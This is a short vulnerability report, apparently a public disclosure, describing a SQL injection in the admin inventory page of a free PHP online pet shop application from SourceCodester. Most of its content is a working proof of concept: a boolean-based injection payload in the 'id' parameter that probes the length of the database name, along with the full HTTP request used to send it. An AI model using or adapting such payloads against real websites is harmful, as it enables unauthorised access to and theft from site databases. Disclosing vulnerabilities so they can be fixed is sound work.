vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=inventory/manage\_inventory&id=

Vulnerability location: /pet\_shop/admin/?page=inventory/manage\_inventory&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=inventory/manage\_inventory&id=8%27%20and%20length(database())%20=11--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=inventory/manage\_inventory&id\=8%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close

length=11 

length=12

Tag

#firefox